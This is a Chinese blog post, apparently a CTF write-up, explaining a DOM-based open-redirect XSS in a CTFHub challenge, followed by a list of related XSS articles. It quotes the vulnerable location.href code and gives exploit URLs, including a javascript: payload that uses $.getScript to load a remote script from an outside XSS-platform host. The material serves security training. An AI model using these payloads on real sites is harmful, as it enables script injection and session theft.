CTFHub XSS DOM跳转 WriteUp

已于 2023-07-05 03:06:30 修改
阅读量2.3k 收藏 18
点赞数 1
分类专栏: CTF 文章标签: xss url跳转 javascript 漏洞 web安全 网络安全 安全
于 2023-07-05 03:05:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49125123/article/details/131546660
版权

前文:DOM反射XSS

进入网站,直接查看源代码,下面是关键代码,这里有xss漏洞:

<script>
        var target = location.search.split("=")
        if (target[0].slice(1) == "jumpto") {
            location.href = target[1];
        }
</script>

这段代码的作用是从当前页面的URL中获取查询字符串(URL的get参数),如果参数名为"jumpto",则将页面重定向到参数值所指定的URL。

具体而言,它使用location.search获取查询字符串部分(例如:“?jumpto=http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800/”),然后使用.split("=")将其拆分为参数名和参数值的数组。

然后,它检查target[0].slice(1)是否等于"jumpto",这是因为target[0]包含"?“字符,使用.slice(1)去掉”?"。如果相等,就使用location.href将页面重定向到target[1],也就是参数值所指定的URL。

注意!当你将类似于 location.href = "javascript:alert('xss')" 这样的代码赋值给 location.href 时,浏览器会将其解释为一种特殊的URL方案,即 “javascript:”。在这种情况下,浏览器会将后面的 JavaScript 代码作为URL的一部分进行解析,然后执行它。

所以我们可以构造如下链接:执行js语句

http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800?jumpto=javascript:alert(1)

在这里插入图片描述

然后构造链接来加载xss平台的代码

http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800/?jumpto=javascript:$.getScript("//xsscom.com//74WcPm")

这段代码使用了 jQuery 的 $.getScript() 函数来异步加载并执行来自 xss平台 的 js 脚本,使用前提是网站引用了jQuery。
在这里插入图片描述

在这里插入图片描述

执行成功,收到flag,提交成功

在这里插入图片描述

成功完成CTFHub的xss技能树所有挑战

在这里插入图片描述

参考文章:xss如何加载远程js的一些tips

CVE-柠檬i
关注
  • 1
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
4.2. XSS
Sumarua的博客
07-02 1237
4.2. XSS 内容索引:4.2. XSS4.2.1. 分类4.2.1.1. 反射型XSS4.2.1.2. 储存型XSS4.2.1.3. DOM XSS4.2.1.4. Blind XSS4.2.2. 危害4.2.3. 同源策略4.2.3.1. 简介4.2.3.1.1. file域的同源策略4.2.3.1.2. cookie的同源策略4.2.3.1.3. Flash/SilverLight跨域4.2.3.2. 源的更改4.2.3.3. 跨源访问4.2.3.3.1. JSONP跨域4.2.3.3.2. 跨源
CTFHub | DOM反射
尼泊罗河伯的博客
01-31 600
查看网页内容发现一个输入框和一个提交表单。第二个输入框用于模拟用户点击访问目标网页的一个过程。
CTFHUB WEB
m0_62566376的博客
07-17 801
ctfhub web笔记
CTF特训营》web部分读书笔记(二)跨站脚本攻击(XSS
闵行小鱼塘
07-27 741
继续阅读《CTF特训营》web部分,本节是XSS
CTFHub XSS DOM反射 WriteUp
柠檬i的博客
07-04 2137
查看前端代码,构造语句闭合标签,以此完成xss攻击
CTFHub XSS DOM 跳转
最新发布
qq_48368964的博客
08-02 413
当你将类似于 location.href = "javascript:alert('xss')" 这样的代码赋值给 location.href 时,浏览器会将其解释为一种特殊的URL方案,即 “javascript:”。在这种情况下,浏览器会将后面的 JavaScript 代码作为URL的一部分进行解析,然后执行它。发现可以 老步骤 去xssaq.com上 复制一个 src来 接受 flag。直接在网页url后面跟上代码测试反弹。
CTFHub——XSS
2302_79119987的博客
03-28 1126
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤。
ctfhubxss
小宇的web博客
05-22 1669
ctfhubxss 1.我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 解题流程 1.先在上面的what’s your name 输入JavaScript语句,发现出错只能使用xss平台在下面的对话框中进行xss漏洞注入。 这里先注册一下xss测试平
ctf xss利用_TCTF/0CTF2018 XSS Writeup
weixin_29923451的博客
01-14 509
作者:LoRexxar'@知道创宇404实验室刚刚4月过去的TCTF/0CTF2018一如既往的给了我们惊喜,其中最大的惊喜莫过于多道xss中Bypass CSP的题目,其中有很多应用于现代网站的防御思路。其中bl0g提及了通过变量覆盖来调用已有代码动态插入Script标签绕过strict-dynamicCSP的利用方式。h4xors.club2则是通过Script Gadgets和postmes...
xss漏洞学习小结,详不详细你说了算
MSB_WLAQ的博客
10-09 841
xss漏洞小结 一、初识XSS 1、什么是XSS XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 coo.
Java代码审计漏洞挖掘(入门)
Ms08067安全实验室
11-10 4644
出品|MS08067实验室(www.ms08067.com)双十一最有意义的事情莫过于是学习一门高级渗透技术了!代码审计属于高级渗透测试服务的一环,顾名思义就是检查源代码中的安全缺陷,检查...
Java代码审计企业级实战
悦分享
07-15 2558
跨站请求伪造是一种使已登录用户在不知情的情况下执行某种动作的攻击。在/reset接口,因为代码@SessionAttributes("user"),将user对象从ModelMap中读出并放入session中,因此user中的answer=hhd也加入了session中。但当输入的反序列化的数据可被用户控制,那么攻击者即可通过构造恶意输入,让反序列化产生非预期的对象,在此过程中执行构造的任意代码。恶意攻击者可以伪造ZIP文件中用来描述解压条目大小的字段,因此,getSize()方法的返回值是不可靠的。...
xss跳转代码_XSS之Beef神器
weixin_39821189的博客
11-20 502
No.1声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。No.2前言Beef 是目前最为流行的 web 框架攻击平台,...
xss跳转代码_XSS(跨站脚本攻击)
weixin_39564831的博客
11-20 1774
XSS攻击流程 1、攻击者将恶意代码注入到服务器中 2、用户在没有防备的情况下访问服务器 3、服务器将含有恶意代码的网页响应给客户端 4、在客户端浏览器中触发恶意的JS代码XSS危害 1、盗取各种用户账号 2、窃取用户Cookie资料,冒充用户身份进入网站 3、劫持用户会话,执行任意操作 4、刷流量,执行弹窗广告 5、传播病毒XSS漏洞的验证 POC 漏洞的验证与检测 E...
xss跳转代码_记一次渗透测试从XSS到Getshell过程(详细到无语)
weixin_39671631的博客
11-22 957
0X00前言前段时间有幸和大佬们参加了一次一周的攻防演练,让我这个菜鸡体验到了红队的感觉。所以打算记录一下其中一个花了三天由xss存储到后台的踩坑过程,希望大佬们多带带。0X01钓鱼到了攻防演练的第二天,早上有个同事和我说这边的一个目标存在存储xss,已经打回了cookie,但是对方开启了http-only无法利用,让我帮忙看看能不能进行钓鱼或者什么的。于是我打开这个站看...
xss跳转代码_XSS跨站脚本攻击-靶场writeup&总结
weixin_39963819的博客
11-21 552
XSS简介XSS(跨站脚本攻击)是指攻击者在网页中嵌入客户端脚本,通常是Javascript编写的恶意代码,当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将在用户的浏览器上被解析执行。XSS Education环境搭建docker search xss # 搜索docker镜像,找到xss education对应的image docker run -d -p {p}:80 {sha} # {...
xss跳转代码_XSS漏洞原理
weixin_39592315的博客
11-21 752
通过给定异常的输入,黑客可以在你的浏览器中,插入一段恶意的 JavaScript 脚本,从而窃取你的隐私信息或者仿冒你进行操作。 在理解漏洞之前,要先动一个概念即通源策略通源策略说到XSS不得不提“SOP同源策略”与URLhttp://store.company.com/dir/page.html进行源对比反射型XSS反射型XSS原理当Web应用程序使用动态页面向用户显示搜索结果时,便会造成一种常...
CTFHub技能树webXSS
wzhwzh123321的博客
02-26 1488
XSS系列的题目中,由于需要使用能够接受XSS数据的平台,并且由于使用的是CTFHub的模拟机器人点击我们的虚假URL,因此使用的XSS平台不能是自己本地搭建的,如果是本地的模拟点击的机器人将无法访问我们给的这个URL地址,也就无法接收到我们想要的数据了,因此想解决本系列的题目,可以通过在线XSS平台或者自己使用服务器搭建一个XSS平台。可以看到可控的位置在53-55行中的这个位置,先闭合前面的单引号和<script>,然后再用一个<script>输入XSS代码,构造语句如下';第三题: DOM反射。
ctfhub web 302跳转
qq_54929891的博客
08-22 2275
从网上找了一下暂时性重定向和永久性重定向的区别 简单记录一下HTTP临时重定向是什么 HTTP重定向:服务器无法处理浏览器发送过来的请求(request),服务器告诉浏览器跳转到可以处理请求的url上。(浏览器会自动访问该URL地址,以至于用户无法分辨是否重定向了。) 重定向的返回码3XX说明。Location响应首部包含了内容的新地址或是优选地址的URL。 状态码 301:在请求的URL已被移除时使用。响应的Location首部中应该包含资源现在所处的URL。 302:与301状态码类似,但是..
CTFhub XSS技能树DOM
07-29
XSS (Cross-Site Scripting) 是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本来实施攻击。DOM (Document Object Model) 是一种用于表示和操作网页文档的编程接口。 在 CTFhub 中,XSS 技能树涵盖了多个与 XSS 相关的知识点和攻击场景。以下是一些可能包含在 XSS 技能树中的主题: 1. XSS 基础知识:深入理解 XSS 的原理、类型和危害。 2. 攻击载体:了解常见的 XSS 攻击载体,如 HTML、JavaScript、CSS、URL 参数等。 3. 攻击向量:学习常见的 XSS 攻击向量,如存储型、反射型和 DOMXSS。 4. 编码技巧:掌握对恶意脚本进行编码和绕过防护机制的技巧。 5. 攻击场景:了解在不同的应用场景下如何利用 XSS 漏洞进行攻击,如登录表单、搜索功能等。 6. 防御措施:学习如何预防和修复 XSS 漏洞,包括输入验证、输出编码、CSP (Content Security Policy) 等。 这只是一个简单的示例,实际的 XSS 技能树可能会更加详细和全面。在学习 XSS 技能树时,你可以通过阅读相关的文档、参与挑战和实践来提高自己的技能。记住,安全意识和代码审计能力也是成为一名优秀的安全工程师的重要因素。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值